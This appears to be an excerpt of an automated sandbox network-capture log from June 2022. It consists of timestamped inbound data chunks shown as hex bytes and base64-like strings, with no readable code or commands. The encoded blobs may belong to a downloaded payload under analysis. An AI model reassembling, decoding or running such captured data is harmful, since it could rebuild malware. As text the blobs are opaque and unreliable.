2022-06-16 18:22:59 UTC	809	IN	Data Raw: 41 4f 72 6a 78 35 2b 4f 73 37 4a 6b 4e 4c 6e 4c 74 64 47 52 67 35 32 56 76 61 78 38 76 71 71 38 73 73 46 63 75 70 4b 35 0d 0a 52 37 4d 4e 70 6e 69 33 6e 6b 6e 73 71 72 72 41 38 62 43 6c 79 63 38 48 73 4c 55 4a 4b 66 44 76 52 73 76 47 68 38 37 41 62 34 75 37 71 38 6a 34 4f 72 71 4b 74 39 63 77 36 69 4a 65 30 53 50 75 0d 0a 4e 50 6f 42 33 74 34 68 4f 63 2f 48 67 69 43 46 62 4b 32 78 51 59 53 36 71 6a 4f 6d 51 30 54 4d 4f 41 6f 55 2f 67 58 65 6e 62 6c 77 72 35 69 6f 64 70 6c 38 69 68 2f 4b 53 63 48 59 49 4d 2b 68 0d 0a 38 4d 63 65 79 4d 61 48 7a 4e 42 72 69 37 75 72 79 6d 43 75 56 58 78 59 43 2f 68 35 54 72 6b 53 36 4d 69 61 2b 4d 6c 2b 79 62 6d 39 76 36 31 73 6d 6f 61 64 4f 4c 2b 30 58 4c 71 71 76 4a 79 4a 0d 0a 58 62 32 53 7a 51 4f 46 79 35 4a 78 76 54 65 Data Ascii: AOrjx5+Os7JkNLnLtdGRg52Vvax8vqq8ssFcupK5R7MNpni3nknsqrrA8bClyc8HsLUJKfDvRsvGh87Ab4u7q8j4OrqKt9cw6iJe0SPuNPoB3t4hOc/HgiCFbK2xQYS6qjOmQ0TMOAoU/gXenblwr5iodpl8ih/KScHYIM+h8MceyMaHzNBri7urymCuVXxYC/h5TrkS6Mia+Ml+ybm9v61smoadOL+0XLqqvJyJXb2SzQOFy5JxvTe
2022-06-16 18:22:59 UTC	825	IN	Data Raw: 6f 76 38 77 2b 71 41 77 79 53 37 59 72 6a 39 55 41 64 68 69 61 6a 51 35 0d 0a 4b 43 48 63 5a 6e 52 45 56 45 48 73 71 6e 5a 34 53 46 71 79 63 59 4a 52 5a 32 34 7a 6f 6a 53 77 57 44 5a 47 51 76 4e 39 6c 47 56 35 59 6d 70 65 4f 50 58 49 4a 62 36 4c 75 37 77 52 47 37 71 35 0d 0a 73 77 32 6d 64 72 38 33 48 65 34 72 73 2b 34 38 7a 41 75 37 79 38 4c 4a 78 37 75 4e 72 73 47 57 79 77 71 71 7a 51 43 73 2b 51 6d 37 71 53 65 2b 75 6f 72 42 48 37 6d 2f 50 35 32 50 59 58 69 62 0d 0a 6a 73 63 66 2b 73 2f 48 51 4d 65 37 6d 6b 71 72 34 6e 6e 58 39 51 69 37 71 2f 32 31 71 4c 37 6b 41 34 37 2b 42 5a 4b 64 6d 6a 2b 76 6d 4f 56 6d 72 66 6a 5a 49 73 6d 35 76 51 66 34 7a 43 43 55 0d 0a 37 79 66 5a 30 63 42 59 71 4c 7a 39 41 5a 44 4b 49 49 4b 75 75 41 53 6b 69 72 38 2f 6c 65 37 Data Ascii: ov8w+qAwyS7Yrj9UAdhiajQ5KCHcZnREVEHsqnZ4SFqycYJRZ24zojSwWDZGQvN9lGV5YmpeOPXIJb6Lu7wRG7q5sw2mdr83He4rs+48zAu7y8LJx7uNrsGWywqqzQCs+Qm7qSe+uorBH7m/P52PYXibjscf+s/HQMe7mkqr4nnX9Qi7q/21qL7kA47+BZKdmj+vmOVmrfjZIsm5vQf4zCCU7yfZ0cBYqLz9AZDKIIKuuASkir8/le7
2022-06-16 18:22:59 UTC	841	IN	Data Raw: 37 50 51 4d 70 38 6d 35 0d 0a 79 62 6c 34 75 5a 71 47 36 2b 63 73 78 6f 65 36 33 74 5a 73 75 36 75 2b 35 67 52 65 2f 41 33 36 2f 6e 6e 53 32 4f 6f 6d 7a 4a 71 4f 78 77 2b 57 7a 51 65 55 4f 77 5a 5a 38 4f 64 57 79 63 61 48 0d 0a 2f 46 31 44 64 45 51 2f 6b 47 33 4e 77 30 6d 31 70 59 71 2f 50 6b 45 66 35 57 64 31 44 63 58 58 67 72 71 39 79 37 48 52 33 59 57 64 6c 62 39 38 32 45 62 51 39 34 69 37 71 38 6a 6f 43 72 6d 4b 0d 0a 74 39 48 34 6a 49 36 75 6d 4f 65 2b 4e 59 36 7a 70 62 33 54 44 73 76 48 75 31 37 73 4b 70 58 4c 78 67 78 4a 6b 73 61 34 75 71 75 2b 62 45 5a 47 64 61 4e 51 73 72 47 2b 72 35 69 52 4d 32 56 78 0d 0a 54 4e 43 7a 69 72 7a 4c 78 38 77 67 70 6d 33 63 65 65 62 39 6a 46 72 48 59 6b 56 55 51 65 62 54 43 6f 71 33 70 66 35 32 61 74 67 69 72 72 67 Data Ascii: 7PQMp8m5ybl4uZqG6+csxoe63tZsu6u+5gRe/A36/nnS2OomzJqOxw+WzQeUOwZZ8OdWycaH/F1DdEQ/kG3Nw0m1pYq/PkEf5Wd1DcXXgrq9y7HR3YWdlb982EbQ94i7q8joCrmKt9H4jI6umOe+NY6zpb3TDsvHu17sKpXLxgxJksa4uqu+bEZGdaNQsrG+r5iRM2VxTNCzirzLx8wgpm3ceeb9jFrHYkVUQebTCoq3pf52atgirrg
2022-06-16 18:22:59 UTC	857	IN	Data Raw: 6c 4a 78 78 38 2b 7a 77 66 41 2f 77 47 5a 65 57 4a 71 4e 50 34 39 74 56 56 44 64 45 54 58 50 47 46 45 4f 32 58 44 46 32 58 7a 63 31 46 6e 62 6a 4e 57 73 61 56 61 4e 45 5a 43 0d 0a 76 32 32 77 5a 69 78 75 5a 59 4a 37 68 38 61 74 66 67 46 4e 33 77 79 64 78 59 64 30 77 52 65 46 76 79 65 6c 5a 44 73 2f 61 73 63 4f 70 4c 57 2b 66 30 45 78 7a 79 69 4a 34 61 73 31 73 44 57 31 0d 0a 50 67 5a 34 52 38 33 43 6a 30 56 46 74 34 6d 69 64 78 38 33 6f 65 77 37 49 2b 78 7a 78 78 38 6d 7a 55 70 6c 30 46 54 63 68 4a 33 6a 63 64 58 37 4f 4c 6c 44 41 55 4e 6e 67 59 54 6d 52 33 56 49 0d 0a 6e 54 44 4d 63 6c 46 6e 62 74 68 73 2b 68 6d 69 74 59 52 47 76 57 32 38 37 6a 78 75 36 64 77 39 55 77 43 6c 65 6a 47 38 57 38 37 42 52 6b 5a 31 77 78 65 42 4e 7a 2b 70 61 4e 67 69 61 73 66 Data Ascii: lJxx8+zwfA/wGZeWJqNP49tVVDdETXPGFEO2XDF2Xzc1FnbjNWsaVaNEZCv22wZixuZYJ7h8atfgFN3wydxYd0wReFvyelZDs/ascOpLW+f0ExzyiJ4as1sDW1PgZ4R83Cj0VFt4midx83oew7I+xzxx8mzUpl0FTchJ3jcdX7OLlDAUNngYTmR3VInTDMclFnbths+hmitYRGvW287jxu6dw9UwClejG8W87BRkZ1wxeBNz+paNgiasf
2022-06-16 18:22:59 UTC	873	IN	Data Raw: 6d 43 79 72 6d 39 4e 44 68 45 5a 66 4c 33 78 73 7a 47 68 38 35 58 45 2f 2f 4a 2f 4c 6d 53 75 63 31 6b 47 71 58 67 37 49 36 75 0d 0a 6d 4f 4f 32 61 59 4f 7a 70 62 2f 44 35 73 7a 48 75 2b 6a 30 62 6f 44 4c 78 76 48 49 39 62 75 4c 75 39 6e 55 79 62 36 35 69 73 48 50 47 63 79 4e 72 75 72 72 6b 35 32 4f 73 39 4f 7a 4c 72 72 4c 0d 0a 78 79 44 75 64 46 4a 71 4e 44 6e 78 79 4d 6d 37 69 37 76 66 31 50 47 2b 75 59 72 44 47 48 6d 39 39 38 6d 66 6b 63 7a 75 2f 4e 53 69 79 62 6e 4a 5a 54 54 4e 38 4f 32 61 6c 63 75 79 2f 64 47 74 0d 0a 76 49 76 4e 30 64 32 51 75 62 6e 2b 78 63 61 49 79 34 33 61 4e 6e 61 36 38 47 6d 7a 70 63 6e 4e 78 79 7a 48 75 35 72 77 35 31 37 4b 78 6f 66 4f 32 46 75 4c 75 36 76 4b 2b 46 36 35 69 72 64 5a 0d 0a 4a 41 6a 37 78 50 65 57 7a 4a 72 4a 52 Data Ascii: mCyrm9NDhEZfL3xszGh85XE//J/LmSuc1kGqXg7I6umOO2aYOzpb/D5szHu+j0boDLxvHI9buLu9nUyb65isHPGcyNrurrk52Os9OzLrrLxyDudFJqNDnxyMm7i7vf1PG+uYrDGHm998mfkczu/NSiybnJZTTN8O2alcuy/dGtvIvN0d2Qubn+xcaIy43aNna68GmzpcnNxyzHu5rw517KxofO2FuLu6vK+F65irdZJAj7xPeWzJrJR
2022-06-16 18:22:59 UTC	889	IN	Data Raw: 52 4f 79 63 53 7a 69 75 61 42 61 68 6a 57 78 2f 6b 46 63 55 70 6b 7a 55 44 4d 0d 0a 64 57 4a 50 5a 63 55 58 69 64 77 37 70 70 69 52 62 44 75 34 6a 77 2b 39 71 68 47 2f 34 52 50 75 41 6b 37 76 79 30 31 6e 45 36 6f 30 63 4d 38 6a 53 65 61 49 46 59 6f 39 55 6f 6f 68 51 6f 42 67 0d 0a 66 73 79 7a 2b 6e 50 5a 38 6b 72 48 79 30 32 6e 4f 79 59 35 4e 2f 59 39 65 42 44 65 72 79 4c 50 49 55 6e 6d 41 45 37 77 69 43 35 6c 79 76 6f 52 51 32 63 6a 37 2f 45 4d 66 6a 39 57 78 76 52 48 0d 0a 57 2b 36 33 69 6e 45 30 4f 58 6a 4f 49 33 50 78 73 69 42 51 35 6f 69 75 54 36 36 68 69 6c 35 36 42 34 38 31 31 5a 71 4f 46 51 4e 6f 47 34 46 68 73 36 67 50 68 67 6f 5a 72 7a 35 6f 49 66 52 44 0d 0a 64 45 52 55 45 54 73 52 35 30 31 49 55 32 55 48 74 77 48 71 4b 38 63 42 30 6b 78 61 4e Data Ascii: ROycSziuaBahjWx/kFcUpkzUDMdWJPZcUXidw7ppiRbDu4jw+9qhG/4RPuAk7vy01nE6o0cM8jSeaIFYo9UoohQoBgfsyz+nPZ8krHy02nOyY5N/Y9eBDeryLPIUnmAE7wiC5lyvoRQ2cj7/EMfj9WxvRHW+63inE0OXjOI3PxsiBQ5oiuT66hil56B4811ZqOFQNoG4Fhs6gPhgoZrz5oIfRDdERUETsR501IU2UHtwHqK8cB0kxaN
2022-06-16 18:22:59 UTC	905	IN	Data Raw: 46 52 78 45 53 4d 36 47 4a 71 0d 0a 4e 4d 59 4e 71 62 30 73 64 55 52 55 47 4b 37 4e 49 35 32 67 66 6f 44 4c 6a 64 49 48 54 6a 50 75 44 46 6a 52 63 55 37 4c 63 65 41 54 6d 67 78 36 34 57 6b 31 4b 36 32 2b 52 48 52 45 31 34 56 68 0d 0a 7a 77 4f 56 77 77 31 6c 42 37 76 59 4b 72 6f 4b 4b 6e 30 36 59 46 32 66 56 72 31 6c 6d 46 34 39 63 57 36 2f 5a 48 51 37 64 38 67 4a 6d 47 38 46 65 6b 37 4e 43 46 77 6c 59 31 2b 7a 52 65 77 71 0d 0a 49 32 45 78 78 52 2f 57 7a 51 2f 73 73 30 43 6b 38 43 65 4b 33 7a 41 35 7a 42 69 58 54 77 74 59 4d 36 73 57 45 52 39 49 43 5a 31 69 63 31 46 6e 37 66 64 31 51 70 66 54 61 36 4a 6a 61 63 54 50 0d 0a 47 48 47 6c 4c 38 6a 48 68 37 71 71 68 44 48 34 56 45 46 74 52 71 35 74 53 46 70 31 76 37 48 61 4b 70 35 58 37 48 78 4d 57 6a 5a 47 47 Data Ascii: FRxESM6GJqNMYNqb0sdURUGK7NI52gfoDLjdIHTjPuDFjRcU7LceATmgx64Wk1K62+RHRE14VhzwOVww1lB7vYKroKKn06YF2fVr1lmF49cW6/ZHQ7d8gJmG8Fek7NCFwlY1+zRewqI2ExxR/WzQ/ss0Ck8CeK3zA5zBiXTwtYM6sWER9ICZ1ic1Fn7fd1QpfTa6JjacTPGHGlL8jHh7qqhDH4VEFtRq5tSFp1v7HaKp5X7HxMWjZGG
2022-06-16 18:22:59 UTC	921	IN	Data Raw: 79 4d 65 37 44 62 56 6a 61 6a 52 70 6b 50 4e 46 51 33 54 50 79 52 32 52 75 62 6e 32 6a 45 72 2b 73 5a 61 6e 6d 4a 47 34 36 4d 6d 36 70 63 6e 46 65 7a 52 46 52 6b 35 34 43 47 41 48 0d 0a 36 2f 76 67 6b 62 75 4c 75 31 51 66 6d 72 42 31 76 41 6e 54 34 50 53 45 72 70 6a 6e 76 71 57 4a 73 36 57 2f 79 36 62 43 78 37 76 73 39 4e 36 53 79 38 62 78 77 49 32 31 69 37 76 52 67 57 4c 43 0d 0a 32 33 5a 49 57 76 62 4d 56 43 64 73 42 42 55 2b 2b 4e 47 4b 77 4c 6d 39 33 7a 44 50 76 66 44 6e 75 73 4c 47 68 30 72 6a 54 2b 6e 4b 51 6b 6c 39 53 66 42 42 31 64 56 6a 50 47 4c 61 6e 71 2f 55 0d 0a 5a 79 59 6d 57 72 74 43 63 37 32 39 71 4a 4f 47 6e 65 65 78 79 59 36 36 71 68 4f 63 73 35 57 2b 6b 73 32 41 74 4b 68 59 4a 54 76 46 56 66 72 69 4a 57 31 68 77 56 36 7a 7a 6b 38 38 4b Data Ascii: yMe7DbVjajRpkPNFQ3TPyR2Rubn2jEr+sZanmJG46Mm6pcnFezRFRk54CGAH6/vgkbuLu1QfmrB1vAnT4PSErpjnvqWJs6W/y6bCx7vs9N6Sy8bxwI21i7vRgWLC23ZIWvbMVCdsBBU++NGKwLm93zDPvfDnusLGh0rjT+nKQkl9SfBB1dVjPGLanq/UZyYmWrtCc729qJOGneexyY66qhOcs5W+ks2AtKhYJTvFVfriJW1hwV6zzk88K
2022-06-16 18:23:00 UTC	937	IN	Data Raw: 72 79 44 36 4c 45 4c 4c 73 43 5a 68 33 52 31 45 7a 51 70 68 35 42 68 71 2f 52 5a 6d 6e 67 7a 35 6e 34 2b 78 4d 6d 56 78 70 33 32 39 0d 0a 69 4b 72 52 4e 6b 52 6c 6b 6e 7a 6a 61 68 47 54 5a 4e 36 4e 6e 42 39 58 51 57 32 74 56 76 36 47 73 72 49 77 63 6c 47 4d 61 62 69 72 6d 61 78 54 4e 6b 62 47 39 44 66 41 44 49 61 64 6c 62 39 2f 0d 0a 61 45 72 69 51 78 4c 4e 45 6e 4d 4c 77 34 5a 36 7a 54 32 4b 79 34 33 53 49 58 34 78 6d 76 63 63 58 6a 5a 47 77 59 70 6f 51 47 56 35 59 47 57 78 66 49 65 36 71 73 67 79 58 4c 31 37 6b 72 6d 35 0d 0a 2b 41 46 61 2f 52 5a 30 51 66 5a 4d 4e 58 58 58 62 6c 77 6d 36 57 41 79 4b 50 78 48 66 33 4c 58 46 6a 39 6f 67 33 64 46 5a 49 74 32 52 33 33 4e 75 53 59 65 30 59 53 35 2f 42 6c 6a 62 6a 4f 4e 0d 0a 67 36 79 6c 79 63 4b 43 51 43 4e Data Ascii: ryD6LELLsCZh3R1EzQph5Bhq/RZmngz5n4+xMmVxp329iKrRNkRlknzjahGTZN6NnB9XQW2tVv6GsrIwclGMabirmaxTNkbG9DfADIadlb9/aEriQxLNEnMLw4Z6zT2Ky43SIX4xmvccXjZGwYpoQGV5YGWxfIe6qsgyXL17krm5+AFa/RZ0QfZMNXXXblwm6WAyKPxHf3LXFj9og3dFZIt2R33NuSYe0YS5/BljbjONg6ylycKCQCN
2022-06-16 18:23:00 UTC	953	IN	Data Raw: 2f 4c 41 65 45 62 79 4f 4d 56 44 4c 63 67 4c 65 52 6d 4c 34 68 69 57 67 31 67 67 30 0d 0a 63 67 6a 69 72 6b 64 70 4e 72 4e 5a 73 37 41 32 4d 62 4a 44 37 58 38 6b 6c 54 64 2b 6b 54 4f 71 76 49 76 42 6f 6a 56 70 67 45 42 31 44 71 56 32 33 55 61 75 6d 4a 47 34 4b 48 30 54 42 47 33 44 0d 0a 69 30 41 37 78 30 52 35 36 53 38 67 78 6e 69 4d 6c 73 69 4c 45 64 2b 74 4f 38 30 7a 66 63 6d 6b 69 73 75 4e 62 68 52 58 73 4b 32 4f 78 78 63 36 64 5a 44 44 54 56 52 65 73 52 46 41 4f 35 59 31 0d 0a 56 5a 53 6c 64 73 2b 53 74 72 31 39 68 77 4e 54 31 33 45 36 47 46 41 33 68 6f 39 4e 63 55 77 77 4e 73 32 79 33 43 68 74 5a 58 6e 68 72 6a 69 79 76 71 35 58 63 4c 51 61 43 59 4c 6d 75 52 50 2b 0d 0a 70 41 65 63 79 49 36 75 6d 4f 30 4f 6a 56 64 46 53 6a 59 79 51 51 66 34 68 7a 4d Data Ascii: /LAeEbyOMVDLcgLeRmL4hiWg1gg0cgjirkdpNrNZs7A2MbJD7X8klTd+kTOqvIvBojVpgEB1DqV23UaumJG4KH0TBG3Di0A7x0R56S8gxniMlsiLEd+tO80zfcmkisuNbhRXsK2Oxxc6dZDDTVResRFAO5Y1VZSlds+Str19hwNT13E6GFA3ho9NcUwwNs2y3ChtZXnhrjiyvq5XcLQaCYLmuRP+pAecyI6umO0OjVdFSjYyQQf4hzM
2022-06-16 18:23:00 UTC	969	IN	Data Raw: 67 69 59 35 65 45 55 4c 48 72 5a 4d 0d 0a 56 48 4b 74 46 68 59 6c 47 41 71 64 4b 79 4b 75 6d 4b 4b 34 6d 69 54 48 74 6d 43 35 4e 7a 69 7a 74 5a 6f 4d 61 70 56 43 50 59 64 7a 76 55 33 2b 52 46 54 43 71 56 62 44 74 54 31 54 73 33 4a 2b 0d 0a 55 44 6b 7a 38 57 31 78 66 35 70 6d 46 68 4a 6b 61 4b 79 50 4e 70 32 56 2b 4c 4b 48 45 4e 36 76 39 7a 6c 63 51 54 34 52 4d 6a 55 69 44 34 70 42 65 72 6d 30 67 4d 79 61 2b 70 51 44 62 38 57 35 0d 0a 59 55 74 70 36 48 55 2f 61 44 51 35 65 42 53 39 66 57 64 45 56 4d 71 56 48 38 4f 4b 50 45 50 34 66 33 4d 41 6d 42 73 37 4e 43 61 6b 39 62 39 47 51 72 66 38 56 4f 43 35 46 32 43 2f 2f 70 4e 48 0d 0a 5a 6f 4d 72 48 77 6d 43 58 6f 59 57 4a 52 67 4b 4a 64 7a 34 48 70 69 52 2f 31 61 78 39 54 34 65 54 31 4a 30 76 30 57 6d 38 70 30 Data Ascii: giY5eEULHrZMVHKtFhYlGAqdKyKumKK4miTHtmC5NziztZoMapVCPYdzvU3+RFTCqVbDtT1Ts3J+UDkz8W1xf5pmFhJkaKyPNp2V+LKHEN6v9zlcQT4RMjUiD4pBerm0gMya+pQDb8W5YUtp6HU/aDQ5eBS9fWdEVMqVH8OKPEP4f3MAmBs7NCak9b9GQrf8VOC5F2C//pNHZoMrHwmCXoYWJRgKJdz4HpiR/1ax9T4eT1J0v0Wm8p0
2022-06-16 18:23:00 UTC	985	IN	Data Raw: 72 4c 54 47 69 36 49 45 2f 78 73 69 42 4f 6b 6a 4e 4f 2f 6f 61 6c 59 41 53 6a 56 6e 65 52 35 59 35 67 4a 6c 72 4a 4d 30 72 63 58 30 56 6c 65 54 4b 56 49 66 32 6f 51 6b 55 64 4b 59 5a 45 0d 0a 51 65 61 35 45 2f 36 6b 44 4a 32 77 69 61 36 59 35 63 50 67 68 7a 68 49 79 54 4e 4f 76 2f 61 37 45 48 47 64 66 77 54 6f 66 31 57 71 6c 5a 39 51 50 6b 47 53 4d 30 71 4b 50 56 4b 4b 49 62 36 42 0d 0a 59 48 35 6a 6a 66 6c 4d 57 6a 59 59 48 2f 59 77 52 4f 36 47 4e 2b 48 59 62 78 41 78 62 6b 74 6b 4c 44 68 36 5a 56 59 75 68 55 4e 53 5a 56 35 67 75 64 4f 53 7a 4a 72 36 76 4e 6e 79 56 73 66 43 0d 0a 54 46 47 61 44 48 4c 68 2b 73 59 4e 53 61 6f 32 66 4c 74 42 63 62 78 42 56 6f 71 65 73 58 6e 4c 42 31 32 59 47 7a 75 61 5a 4d 79 4b 4d 56 59 63 61 66 70 49 5a 66 4b 64 50 37 2f Data Ascii: rLTGi6IE/xsiBOkjNO/oalYASjVneR5Y5gJlrJM0rcX0VleTKVIf2oQkUdKYZEQea5E/6kDJ2wia6Y5cPghzhIyTNOv/a7EHGdfwTof1WqlZ9QPkGSM0qKPVKKIb6BYH5jjflMWjYYH/YwRO6GN+HYbxAxbktkLDh6ZVYuhUNSZV5gudOSzJr6vNnyVsfCTFGaDHLh+sYNSao2fLtBcbxBVoqesXnLB12YGzuaZMyKMVYcafpIZfKdP7/
2022-06-16 18:23:00 UTC	1001	IN	Data Raw: 48 39 68 56 72 48 6b 30 52 55 51 65 59 37 76 6b 61 49 43 69 56 6b 49 67 45 77 50 63 77 51 59 62 4d 76 4f 71 37 41 35 73 65 37 37 6f 6e 6e 0d 0a 6e 44 75 39 76 6b 56 56 51 38 35 45 55 45 46 74 77 78 4e 6c 50 47 4c 2b 63 56 4c 55 70 32 47 33 31 6e 46 4d 57 67 32 32 54 62 75 52 52 47 56 35 55 61 4e 6c 61 43 6b 56 71 6a 5a 6f 45 77 65 2b 0d 0a 47 46 61 35 41 45 53 79 4d 4f 61 4e 72 75 79 65 74 70 4e 2b 79 64 45 32 52 6b 4c 64 76 45 52 6c 65 65 39 75 41 72 51 77 54 57 36 43 62 34 52 33 67 42 6c 70 66 62 63 2f 53 5a 30 30 2f 56 46 6e 0d 0a 35 63 2f 67 6a 6a 67 36 38 55 47 4f 2b 44 68 45 6a 6d 6f 79 67 6a 36 50 68 37 72 65 75 79 33 42 71 7a 55 6d 67 55 47 6f 6c 56 70 31 74 37 56 5a 6a 47 77 41 6d 76 53 7a 4c 67 77 73 51 6c 34 34 0d 0a 4c 6d 55 76 4e 5a 56 42 77 Data Ascii: H9hVrHk0RUQeY7vkaICiVkIgEwPcwQYbMvOq7A5se77onnnDu9vkVVQ85EUEFtwxNlPGL+cVLUp2G31nFMWg22TbuRRGV5UaNlaCkVqjZoEwe+GFa5AESyMOaNruyetpN+ydE2RkLdvERlee9uArQwTW6Cb4R3gBlpfbc/SZ00/VFn5c/gjjg68UGO+DhEjmoygj6Ph7reuy3BqzUmgUGolVp1t7VZjGwAmvSzLgwsQl44LmUvNZVBw
2022-06-16 18:23:00 UTC	1017	IN	Data Raw: 61 73 51 48 76 51 6c 4d 77 33 52 4d 38 7a 57 44 7a 2b 4e 6e 47 47 41 56 56 32 6d 51 53 35 0d 0a 63 65 56 31 67 75 58 43 78 35 39 36 62 66 37 30 73 44 35 52 31 72 70 33 4d 46 36 2b 57 36 37 53 64 55 68 61 4c 4c 2b 4b 59 72 7a 6e 54 57 6b 69 48 7a 41 31 4c 67 45 34 50 31 53 4e 52 38 4f 56 0d 0a 79 37 49 32 54 61 4f 43 63 30 76 42 67 32 4c 38 70 33 78 48 79 4c 55 57 6f 6c 37 64 6a 7a 74 71 34 34 7a 65 35 6a 4e 42 76 57 5a 4d 4f 69 63 35 6f 2f 65 79 68 78 44 65 72 79 63 53 33 7a 52 6c 0d 0a 64 5a 30 69 49 6c 67 76 76 33 7a 63 48 6d 78 56 37 6e 42 50 6b 46 42 39 67 55 48 4f 62 36 70 4b 6f 72 76 4e 75 6f 46 47 57 74 65 30 7a 52 4a 52 47 55 79 35 51 36 42 34 64 54 52 79 43 4f 79 2b 0d 0a 59 44 59 62 54 7a 49 56 53 55 55 6b 73 52 4a 70 6b 61 7a 4b 79 38 61 4f 41 Data Ascii: asQHvQlMw3RM8zWDz+NnGGAVV2mQS5ceV1guXCx596bf70sD5R1rp3MF6+W67SdUhaLL+KYrznTWkiHzA1LgE4P1SNR8OVy7I2TaOCc0vBg2L8p3xHyLUWol7djztq44ze5jNBvWZMOic5o/eyhxDerycS3zRldZ0iIlgvv3zcHmxV7nBPkFB9gUHOb6pKorvNuoFGWte0zRJRGUy5Q6B4dTRyCOy+YDYbTzIVSUUksRJpkazKy8aOA
2022-06-16 18:23:00 UTC	1033	IN	Data Raw: 74 35 37 46 55 31 65 2b 63 2b 58 55 46 4b 0d 0a 69 67 44 43 75 66 46 4b 4d 32 55 6f 7a 36 4c 4a 4d 6b 48 4c 66 61 44 45 41 55 70 6a 4a 4c 4a 38 39 64 61 44 56 42 53 72 56 44 32 57 51 57 58 70 49 6c 30 39 59 71 35 54 33 74 76 56 4d 62 4f 6c 0d 0a 62 2b 63 36 48 44 46 55 35 6c 33 53 61 6e 4c 53 35 49 49 51 76 34 71 37 71 37 36 46 56 55 5a 31 53 4e 45 77 30 50 6b 63 6c 77 71 36 61 48 46 4d 57 6a 59 66 48 57 70 6a 6a 61 59 54 61 6f 49 71 0d 0a 48 34 65 36 44 49 44 2f 75 77 48 4b 67 52 44 4e 41 45 41 4e 2b 45 70 2b 32 6d 44 2b 38 6f 31 38 35 46 74 43 59 38 6b 7a 71 49 57 4e 66 38 70 72 51 43 4b 48 4d 31 47 72 4a 67 53 72 76 6a 54 2b 0d 0a 2b 59 75 33 70 59 55 56 64 57 4b 6e 35 33 56 68 2b 45 72 54 63 45 34 64 61 6d 57 48 37 6f 59 33 34 64 69 79 4e 55 33 57 75 Data Ascii: t57FU1e+c+XUFKigDCufFKM2Uoz6LJMkHLfaDEAUpjJLJ89daDVBSrVD2WQWXpIl09Yq5T3tvVMbOlb+c6HDFU5l3SanLS5IIQv4q7q76FVUZ1SNEw0Pkclwq6aHFMWjYfHWpjjaYTaoIqH4e6DID/uwHKgRDNAEAN+Ep+2mD+8o185FtCY8kzqIWNf8prQCKHM1GrJgSrvjT++Yu3pYUVdWKn53Vh+ErTcE4damWH7oY34diyNU3Wu
2022-06-16 18:23:00 UTC	1049	IN	Data Raw: 73 78 4b 4a 6d 44 36 62 6e 70 30 73 53 34 72 4c 72 78 53 66 4e 32 6f 37 4b 6f 57 5a 58 45 6f 71 58 4d 35 4d 64 5a 45 39 64 4d 72 47 2b 79 43 78 51 2f 38 42 58 4c 35 64 72 74 79 6d 74 36 55 73 0d 0a 74 78 65 74 5a 2b 56 32 61 66 70 4d 30 51 62 4e 6c 50 58 43 51 75 36 2f 34 59 6f 4c 55 72 42 39 33 6b 66 68 31 48 78 49 66 62 41 43 66 57 42 62 41 54 38 6b 75 62 56 75 4d 32 55 6f 78 36 72 64 0d 0a 53 4b 6f 77 55 62 71 61 76 6d 4a 6a 4e 44 6c 34 78 70 75 38 2f 54 47 77 68 69 69 36 75 49 71 33 70 5a 30 6a 63 6c 46 6e 35 66 58 75 50 4c 77 2b 76 30 74 43 4e 44 68 45 50 43 59 38 4d 66 33 37 0d 0a 64 45 58 65 4e 70 44 50 45 56 47 53 64 71 34 34 6d 36 57 4b 62 62 48 61 6d 44 75 34 69 66 4b 67 53 6d 44 4e 4e 7a 79 37 75 70 73 4d 64 34 4b 55 55 59 61 36 31 6d 4e 30 72 Data Ascii: sxKJmD6bnp0sS4rLrxSfN2o7KoWZXEoqXM5MdZE9dMrG+yCxQ/8BXL5drtymt6UstxetZ+V2afpM0QbNlPXCQu6/4YoLUrB93kfh1HxIfbACfWBbAT8kubVuM2Uox6rdSKowUbqavmJjNDl4xpu8/TGwhii6uIq3pZ0jclFn5fXuPLw+v0tCNDhEPCY8Mf37dEXeNpDPEVGSdq44m6WKbbHamDu4ifKgSmDNNzy7upsMd4KUUYa61mN0r
2022-06-16 18:23:00 UTC	1065	IN	Data Raw: 32 63 77 5a 76 4c 6d 4b 6f 65 4f 72 7a 59 33 63 36 70 62 49 6d 6f 36 6c 39 4f 69 2f 76 62 2b 31 4b 4a 71 47 6e 59 50 6e 34 59 47 36 33 73 34 6b 0d 0a 75 61 75 2b 68 4a 36 62 6a 4c 66 58 2b 50 69 4c 72 70 69 48 2f 72 69 49 73 7a 4b 47 4d 30 4d 6b 55 6b 59 50 59 65 2f 76 7a 4d 4b 48 75 67 57 72 4b 4b 47 70 76 71 34 75 39 67 42 4a 53 68 38 7a 0d 0a 47 45 6e 71 36 38 2b 63 6a 72 4d 4b 33 67 43 6e 79 63 65 48 36 44 54 57 67 7a 33 6b 67 62 72 59 7a 6c 43 39 71 37 36 45 79 4a 75 4d 74 39 66 34 6c 49 2b 75 6d 49 65 77 75 49 69 7a 30 62 73 47 0d 0a 76 38 76 48 72 52 32 6b 6d 35 57 2f 74 41 53 36 71 72 79 64 47 59 79 34 6b 73 33 4c 54 62 57 6c 69 74 30 51 6a 4a 36 52 75 4f 67 4a 73 36 58 4a 72 77 58 73 77 62 76 6f 39 42 4b 58 79 38 61 52 0d 0a 43 59 69 36 69 38 2f Data Ascii: 2cwZvLmKoeOrzY3c6pbImo6l9Oi/vb+1KJqGnYPn4YG63s4kuau+hJ6bjLfX+PiLrpiH/riIszKGM0MkUkYPYe/vzMKHugWrKKGpvq4u9gBJSh8zGEnq68+cjrMK3gCnyceH6DTWgz3kgbrYzlC9q76EyJuMt9f4lI+umIewuIiz0bsGv8vHrR2km5W/tAS6qrydGYy4ks3LTbWlit0QjJ6RuOgJs6XJrwXswbvo9BKXy8aRCYi6i8/
2022-06-16 18:23:00 UTC	1081	IN	Data Raw: 53 55 39 57 6e 4f 61 53 69 4d 74 79 55 57 64 75 4d 32 56 78 54 46 6f 32 52 6b 49 30 4f 45 52 6c 0d 0a 65 57 4a 71 4e 44 6c 34 52 56 56 44 64 45 52 55 51 57 31 47 52 6e 56 49 57 6e 55 30 63 6c 46 6e 62 6a 4e 6c 63 55 78 61 4e 6b 5a 43 4e 44 68 45 5a 58 6c 69 61 6a 51 35 65 45 56 56 51 33 52 45 0d 0a 56 45 46 74 52 6b 5a 31 53 46 70 31 4e 48 4a 52 5a 32 34 7a 5a 58 46 4d 57 6a 5a 47 51 6a 51 34 52 47 56 35 59 6d 6f 30 4f 58 68 46 56 55 4e 30 52 46 52 42 62 55 5a 47 64 55 68 61 64 54 52 79 0d 0a 55 57 64 75 4d 32 56 78 54 46 6f 32 52 6b 49 30 4f 45 52 6c 65 66 4b 52 50 44 6d 53 75 46 31 44 71 4c 6c 63 51 63 32 2b 54 6e 58 30 6f 6e 30 30 6f 71 